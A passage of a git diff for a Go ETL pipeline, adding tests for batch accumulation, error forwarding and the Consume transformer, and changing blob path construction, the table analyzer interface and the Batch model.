make(chan struct{}) + go func() { + tr.Consume(ctx, columns, noRetry(), batchSize, chIn, chOut, chErr, wg) + close(done) + }() + return done +} + +func drainOut(chOut <-chan models.Batch, wg *sync.WaitGroup) []models.Batch { + var batches []models.Batch + for { + select { + case b := <-chOut: + batches = append(batches, b) + wg.Done() + default: + return batches + } + } +} +func TestBatchAccumulator_Add(t *testing.T) { + acc := &batchAccumulator{batchSize: 5} + b1 := makeBatch(2) + b2 := makeBatch(3) + + acc.add(b1) + acc.add(b2) + + if len(acc.rows) != 5 { + t.Errorf("expected 5 rows, got %d", len(acc.rows)) + } + if len(acc.parents) != 2 { + t.Fatalf("expected 2 parents, got %d", len(acc.parents)) + } + if acc.parents[0].Id != b1.Id || acc.parents[1].Id != b2.Id { + t.Error("parent IDs do not match source batch IDs") + } +} + +func TestBatchAccumulator_Ready(t *testing.T) { + acc := &batchAccumulator{batchSize: 3} + acc.add(makeBatch(2)) + if acc.ready() { + t.Error("should not be ready with 2 rows and batchSize=3") + } + acc.add(makeBatch(1)) + if !acc.ready() { + t.Error("should be ready with 3 rows and batchSize=3") + } +} + +func TestBatchAccumulator_Flush_Empty(t *testing.T) { + acc := &batchAccumulator{batchSize: 5} + chOut := make(chan models.Batch, 1) + var wg sync.WaitGroup + + if !acc.flush(context.Background(), chOut, &wg) { + t.Error("flush on empty accumulator should return true") + } + if len(chOut) != 0 { + t.Error("flush on empty accumulator should send nothing") + } +} + +func TestBatchAccumulator_Flush_Success(t *testing.T) { + acc := &batchAccumulator{batchSize: 2} + b := makeBatch(2) + acc.add(b) + + chOut := make(chan models.Batch, 1) + var wg sync.WaitGroup + + if !acc.flush(context.Background(), chOut, &wg) { + t.Fatal("flush should return true on success") + } + + select { + case out := <-chOut: + wg.Done() + if len(out.Rows) != 2 { + t.Errorf("expected 2 rows in flushed batch, got %d", len(out.Rows)) + } + if len(out.ParentBatches) != 1 || out.ParentBatches[0].Id != b.Id { + t.Error("flushed batch should reference the source batch as parent") + } + default: + t.Error("expected a batch in chOut after flush") + } + + if len(acc.rows) != 0 || len(acc.parents) != 0 { + t.Error("accumulator state should be reset after flush") + } + wg.Wait() +} + +func TestBatchAccumulator_Flush_ContextCancelled(t *testing.T) { + acc := &batchAccumulator{batchSize: 2} + acc.add(makeBatch(2)) + + chOut := make(chan models.Batch) + var wg sync.WaitGroup + + ctx, cancel := context.WithCancel(context.Background()) + cancel() + + if acc.flush(ctx, chOut, &wg) { + t.Error("flush should return false when context is cancelled") + } + + wg.Wait() +} + +func TestSendTransformError_PlainError(t *testing.T) { + ch := make(chan custom_errors.JobError, 1) + + sendTransformError(context.Background(), errors.New("something broke"), ch) + + select { + case e := <-ch: + if !e.ShouldCancelJob { + t.Error("plain error should produce ShouldCancelJob=true") + } + default: + t.Error("expected a job error in the channel") + } +} + +func TestSendTransformError_JobError_Passthrough(t *testing.T) { + ch := make(chan custom_errors.JobError, 1) + original := &custom_errors.JobError{ShouldCancelJob: false, Msg: "custom msg"} + + sendTransformError(context.Background(), original, ch) + + select { + case e := <-ch: + if e.ShouldCancelJob != false || e.Msg != "custom msg" { + t.Errorf("JobError should pass through unchanged, got %+v", e) + } + default: + t.Error("expected a job error in the channel") + } +} + +func TestSendTransformError_ContextCancelled_Silent(t *testing.T) { + ch := make(chan custom_errors.JobError, 1) + + ctx, cancel := context.WithCancel(context.Background()) + cancel() + + sendTransformError(ctx, context.Canceled, ch) + + if len(ch) != 0 { + t.Error("context.Canceled should be silently dropped") + } +} + +func TestSendTransformError_DeadlineExceeded_Silent(t *testing.T) { + ch := make(chan custom_errors.JobError, 1) + + ctx, cancel := context.WithCancel(context.Background()) + cancel() + + sendTransformError(ctx, context.DeadlineExceeded, ch) + + if len(ch) != 0 { + t.Error("context.DeadlineExceeded should be silently dropped") + } +} + +func TestConsume_Passthrough_PreservesOriginalBatch(t *testing.T) { + tr := newTransformer() + chIn := make(chan models.Batch, 1) + chOut := make(chan models.Batch, 1) + chErr := make(chan custom_errors.JobError, 1) + var wg sync.WaitGroup + + batch := makeBatch(3) + chIn <- batch + close(chIn) + + done := runConsume(context.Background(), tr, nil, 0, chIn, chOut, chErr, &wg) + + select { + case got := <-chOut: + wg.Done() + if got.Id != batch.Id { + t.Error("passthrough should preserve the original batch ID") + } + if len(got.Rows) != 3 { + t.Errorf("expected 3 rows, got %d", len(got.Rows)) + } + case <-time.After(testTimeout): + t.Fatal("timeout waiting for output batch") + } + + <-done + wg.Wait() +} + +func TestConsume_Passthrough_WaitGroupBalanced(t *testing.T) { + tr := newTransformer() + chIn := make(chan models.Batch, 3) + chOut := make(chan models.Batch, 3) + chErr := make(chan custom_errors.JobError, 1) + var wg sync.WaitGroup + + for range 3 { + chIn <- makeBatch(1) + } + close(chIn) + + done := runConsume(context.Background(), tr, nil, 0, chIn, chOut, chErr, &wg) + <-done + + batches := drainOut(chOut, &wg) + if len(batches) != 3 { + t.Errorf("expected 3 output batches, got %d", len(batches)) + } + + wg.Wait() +} + +func TestConsume_Accumulation_FlushOnThreshold(t *testing.T) { + tr := newTransformer() + chIn := make(chan models.Batch, 3) + chOut := make(chan models.Batch, 2) + chErr := make(chan custom_errors.JobError, 1) + var wg sync.WaitGroup + + for range 3 { + chIn <- makeBatch(1) + } + close(chIn) + + done := runConsume(context.Background(), tr, nil, 3, chIn, chOut, chErr, &wg) + <-done + + batches := drainOut(chOut, &wg) + if len(batches) != 1 { + t.Fatalf("expected 1 accumulated batch, got %d", len(batches)) + } + if len(batches[0].Rows) != 3 { + t.Errorf("expected 3 rows in accumulated batch, got %d", len(batches[0].Rows)) + } + wg.Wait() +} + +func TestConsume_Accumulation_FlushOnClose(t *testing.T) { + tr := newTransformer() + chIn := make(chan models.Batch, 2) + chOut := make(chan models.Batch, 2) + chErr := make(chan custom_errors.JobError, 1) + var wg sync.WaitGroup + + chIn <- makeBatch(1) + chIn <- makeBatch(1) + close(chIn) + + done := runConsume(context.Background(), tr, nil, 10, chIn, chOut, chErr, &wg) + <-done + + batches := drainOut(chOut, &wg) + if len(batches) != 1 { + t.Fatalf("expected 1 batch flushed on close, got %d", len(batches)) + } + if len(batches[0].Rows) != 2 { + t.Errorf("expected 2 rows, got %d", len(batches[0].Rows)) + } + wg.Wait() +} + +func TestConsume_Accumulation_TracksAllParentBatches(t *testing.T) { + tr := newTransformer() + chIn := make(chan models.Batch, 2) + chOut := make(chan models.Batch, 2) + chErr := make(chan custom_errors.JobError, 1) + var wg sync.WaitGroup + + b1 := makeBatch(1) + b2 := makeBatch(1) + chIn <- b1 + chIn <- b2 + close(chIn) + + done := runConsume(context.Background(), tr, nil, 10, chIn, chOut, chErr, &wg) + <-done + + batches := drainOut(chOut, &wg) + if len(batches) != 1 { + t.Fatalf("expected 1 output batch, got %d", len(batches)) + } + parents := batches[0].ParentBatches + if len(parents) != 2 { + t.Fatalf("expected 2 parent refs, got %d", len(parents)) + } + if parents[0].Id != b1.Id || parents[1].Id != b2.Id { + t.Error("parent IDs should match source batch IDs in order") + } + wg.Wait() +} + +func TestConsume_Accumulation_MultipleFlushes(t *testing.T) { + tr := newTransformer() + chIn := make(chan models.Batch, 5) + chOut := make(chan models.Batch, 5) + chErr := make(chan custom_errors.JobError, 1) + var wg sync.WaitGroup + + for range 5 { + chIn <- makeBatch(1) + } + close(chIn) + + done := runConsume(context.Background(), tr, nil, 2, chIn, chOut, chErr, &wg) + <-done + + batches := drainOut(chOut, &wg) + if len(batches) != 3 { + t.Fatalf("expected 3 output batches (2+2+1 rows), got %d", len(batches)) + } + totalRows := 0 + for _, b := range batches { + totalRows += len(b.Rows) + } + if totalRows != 5 { + t.Errorf("expected 5 total rows across all batches, got %d", totalRows) + } + wg.Wait() +} + +func TestConsume_EmptyInput_NoOutput(t *testing.T) { + tr := newTransformer() + chIn := make(chan models.Batch) + chOut := make(chan models.Batch, 1) + chErr := make(chan custom_errors.JobError, 1) + var wg sync.WaitGroup + + close(chIn) + + done := runConsume(context.Background(), tr, nil, 5, chIn, chOut, chErr, &wg) + + select { + case <-done: + case <-time.After(testTimeout): + t.Fatal("timeout: Consume did not exit after empty input channel was closed") + } + + if len(chOut) != 0 { + t.Error("expected no output for empty input") + } + wg.Wait() +} + +func TestConsume_TransformError_SendsJobError(t *testing.T) { + tr := newTransformer() + col := uuidColumn() + + chIn := make(chan models.Batch, 1) + chOut := make(chan models.Batch, 1) + chErr := make(chan custom_errors.JobError, 1) + var wg sync.WaitGroup + + batch := models.Batch{ + Id: uuid.New(), + Rows: []models.UnknownRowValues{{[]byte{1, 2, 3}}}, + } + chIn <- batch + + done := runConsume(context.Background(), tr, []models.ColumnType{col}, 0, chIn, chOut, chErr, &wg) + + select { + case err := <-chErr: + if !err.ShouldCancelJob { + t.Error("transform error should set ShouldCancelJob=true") + } + case <-time.After(testTimeout): + t.Fatal("timeout: expected a job error from transform failure") + } + + <-done + wg.Wait() +} + +func TestConsume_TransformError_NoOutputForwarded(t *testing.T) { + tr := newTransformer() + col := uuidColumn() + + chIn := make(chan models.Batch, 1) + chOut := make(chan models.Batch, 1) + chErr := make(chan custom_errors.JobError, 1) + var wg sync.WaitGroup + + batch := models.Batch{ + Id: uuid.New(), + Rows: []models.UnknownRowValues{{[]byte{1, 2, 3}}}, + } + chIn <- batch + + done := runConsume(context.Background(), tr, []models.ColumnType{col}, 0, chIn, chOut, chErr, &wg) + <-done + + if len(chOut) != 0 { + t.Error("no batch should be forwarded when transformation fails") + } + wg.Wait() +} + +func TestConsume_ContextCancellation_Exits(t *testing.T) { + tr := newTransformer() + chIn := make(chan models.Batch) + chOut := make(chan models.Batch, 1) + chErr := make(chan custom_errors.JobError, 1) + var wg sync.WaitGroup + + ctx, cancel := context.WithCancel(context.Background()) + done := runConsume(ctx, tr, nil, 0, chIn, chOut, chErr, &wg) + + cancel() + + select { + case <-done: + case <-time.After(testTimeout): + t.Fatal("timeout: Consume did not exit after context cancellation") + } + wg.Wait() +} + +func TestConsume_Transform_DatetimeConvertedToUTC(t *testing.T) { + tr := newTransformer() + col := models.NewColumnType("col_dt", false, false, "datetime", "datetime", "timestamp", false, 0, 0, 0) + + chIn := make(chan models.Batch, 1) + chOut := make(chan models.Batch, 1) + chErr := make(chan custom_errors.JobError, 1) + var wg sync.WaitGroup + + nonUTC := time.Date(2024, 1, 15, 12, 0, 0, 0, time.FixedZone("EST", -5*3600)) + batch := models.Batch{ + Id: uuid.New(), + Rows: []models.UnknownRowValues{{nonUTC}}, + } + chIn <- batch + close(chIn) + + done := runConsume(context.Background(), tr, []models.ColumnType{col}, 0, chIn, chOut, chErr, &wg) + <-done + + select { + case got := <-chOut: + wg.Done() + result, ok := got.Rows[0][0].(time.Time) + if !ok { + t.Fatal("expected time.Time in output row") + } + if result.Location() != time.UTC { + t.Errorf("expected UTC location after transform, got %v", result.Location()) + } + default: + t.Error("expected an output batch") + } + + wg.Wait() +} + +func TestConsume_Transform_NilValueSkipped(t *testing.T) { + tr := newTransformer() + col := uuidColumn() + + chIn := make(chan models.Batch, 1) + chOut := make(chan models.Batch, 1) + chErr := make(chan custom_errors.JobError, 1) + var wg sync.WaitGroup + + batch := models.Batch{ + Id: uuid.New(), + Rows: []models.UnknownRowValues{{nil}}, + } + chIn <- batch + close(chIn) + + done := runConsume(context.Background(), tr, []models.ColumnType{col}, 0, chIn, chOut, chErr, &wg) + <-done + + select { + case got := <-chOut: + wg.Done() + if got.Rows[0][0] != nil { + t.Error("nil value should pass through unchanged") + } + default: + t.Error("expected an output batch even when value is nil") + } + + if len(chErr) != 0 { + t.Error("nil value should not produce an error") + } + wg.Wait() +} diff --git a/internal/app/etl/transformers/plan.go b/internal/app/etl/transformers/plan.go index 5758dba..2cea12b 100644 --- a/internal/app/etl/transformers/plan.go +++ b/internal/app/etl/transformers/plan.go @@ -3,6 +3,7 @@ package transformers import ( "context" "fmt" + "path" "strings" "time" @@ -99,12 +100,11 @@ func computeStorageTransformationPlan( } b, ok := v.([]byte) if !ok { - logrus.Warnf("to_storage: expected []byte for %s.%s.%s, got %T — passing through", - schema, table, sourceColName, v) + logrus.Warnf("to_storage: expected []byte for %s.%s.%s, got %T — passing through", schema, table, sourceColName, v) return v, nil } // start := time.Now() - blobPath := fmt.Sprintf("%s/%s/%s", schema, table, uuid.New().String()) + blobPath := path.Join(storageCol.Prefix, uuid.New().String()) blobURL, err := azureClient.UploadAndGetURL(ctx, blobPath, b) if err != nil { return nil, &custom_errors.JobError{ diff --git a/internal/app/etl/types.go b/internal/app/etl/types.go index a1970ae..991c5b2 100644 --- a/internal/app/etl/types.go +++ b/internal/app/etl/types.go @@ -29,6 +29,11 @@ type Transformer interface { ) } +type MaxMinColumnResult struct { + Max int64 + Min int64 +} + type TableAnalyzer interface { QueryColumnTypes( ctx context.Context, @@ -40,10 +45,17 @@ type TableAnalyzer interface { tableInfo config.TableInfo, ) (int64, error) + QueryMaxMinFromColumn( + ctx context.Context, + tableInfo config.TableInfo, + columnName string, + ) (MaxMinColumnResult, error) + CalculatePartitionRanges( ctx context.Context, tableInfo config.TableInfo, partitionColumn string, maxPartitions int64, + rangeConstraint config.RangeConfig, ) ([]models.Partition, error) } diff --git a/internal/app/models/main.go b/internal/app/models/main.go index 5becf6a..42558a9 100644 --- a/internal/app/models/main.go +++ b/internal/app/models/main.go @@ -8,12 +8,16 @@ import ( type UnknownRowValues = []any +type BatchRef struct { + Id uuid.UUID + PartitionId uuid.UUID +} + type Batch struct { - Id uuid.UUID - PartitionId uuid.UUID - ParentBatchesId []uuid.UUID - Rows []UnknownRowValues - RetryCounter int + Id uuid.UUID + ParentBatches []BatchRef + Rows []UnknownRowValues + RetryCounter int } type PartitionRange struct {